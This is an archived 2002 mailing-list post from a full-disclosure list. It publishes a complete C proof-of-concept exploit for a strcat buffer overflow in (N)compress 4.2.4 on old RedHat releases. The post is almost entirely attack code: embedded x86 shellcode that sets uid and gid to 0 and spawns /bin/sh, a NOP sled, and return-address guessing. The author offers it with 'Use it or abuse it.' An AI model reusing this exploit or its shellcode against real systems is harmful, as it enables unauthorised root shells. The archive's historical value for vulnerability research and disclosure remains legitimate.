lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200211290713.gAT7DINB054556@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - /usr/bin/compress exploit

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Here is a proof-of-concept code demonstrating a vulnerability in
/usr/bin/compress.  Use it or abuse it.

/*
 * PROOF OF CONCEPT
 * Information System Advancement in Penetration (ISAP) Labs
 *
 * (N)compress 4.2.4 Exploit
 * By: Lunar Fault [ElectronicSouls]
 *
 * Vulnerable Systems found is: RedHat 6.2, 7.0, 7.1, and 7.2
 *
 * Discription:  Simple unchecked b0f involving strcat.  This
 * exploit was tested on RedHat 6.2, 7.0, and 7.1.  This is only a
 * Proof of concept.  /usr/bin/compress is not suid root by default.
 *
 * April 22, 2002
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define VULN "/usr/bin/compress"
#define NOP 0x90909090
#define NOPLEN 500

/* Thanx to 0x90 for the shellcode :) */
/* Shellcode does a chuid(0), chgrp(0), then executes /bin/sh */
const unsigned char linux_x86_exec_hellcode[] =
"\x29\xc0\xb0\x46\x29\xdb\xb3\x0c\x80\xeb\x0c\x89\xd9\xcd\x80\xeb\x18\x5e\x29"
"\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08\x8d\x53"
"\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

unsigned long get_sp(void)
{
   __asm__(" mov %esp, %eax");
}

void usage(char *prog)
{
   printf("<+> (N)compress 4.2.4 Exploit\n");
   printf("<+> By: Lunar Fault [ElectronicSouls]\n");
   printf("<+> Information System Advancement in Penetration (ISAP) Labs\n");
   printf("<!> usage: %s [options]\n", prog);
   printf("\t\t-h  help\n");
   printf("\t\t-o <offset>     Example: 100\n");
   printf("\t\t-r <return>     Example: 0xbfffc680\n");
   printf("\t\t-s <size>       Example: 1056\n");
   exit(1);}

int main(int argv, char *argc[]) {
   int i, c, ret, offset;
   long len;
   char *buffer;

   offset = 0;
   len = 1056;

   ret = get_sp();
   ret = ret - 250;  /* Subtracting 250 from sp to bring the return somewhere in the NOP */

   printf("<+> (N)compress 4.2.4 Exploit\n");
   printf("<+> By: Lunar Fault [ElectronicSouls]\n");
   printf("<+> Information System Advancement in Penetration (ISAP) Labs\n");

   if (argv > 1) {

      while ((c = getopt (argv, argc, "r:s:o:h"))!=EOF) {
         switch(c) {
            case 'r':
               ret = strtoll(optarg, NULL, 0);
               break;
            case 's':
               len = atoi(optarg);
               if (len < (NOPLEN + strlen(linux_x86_exec_hellcode) + 100)) {
                  printf("<!> Size is too small to work\n");
                  exit(1);
               }
               break;
            case 'o':
               offset = atoi(optarg);
               break;
            case 'h':
               usage(argc[0]);
         }
      }
   }

   buffer = (char *) malloc(len);
   ret = ret + offset;

   for (i=0;i<len;i+=4)
      *(long*) &buffer[i] = NOP;

   for (i=NOPLEN;i<len;i+=4)
      *(long*) &buffer[i] = ret;

   memcpy(buffer+NOPLEN, linux_x86_exec_hellcode, strlen(linux_x86_exec_hellcode));

   printf("<*> Offset = %d\n", offset);
   printf("<*> Return = 0x%.8x\n", ret);
   printf("<*> Size = %d\n\n", len);

   execl(VULN, VULN, buffer, 0);

   return 0;
}

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"The end is now."


-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nE50MHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt2zUAoKzlEfXzhbiX
0IwM3GWiRfyNWub8AJ4zOt0daZO93e2HHyokvrfcS/vTQQ==
=ABKy
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ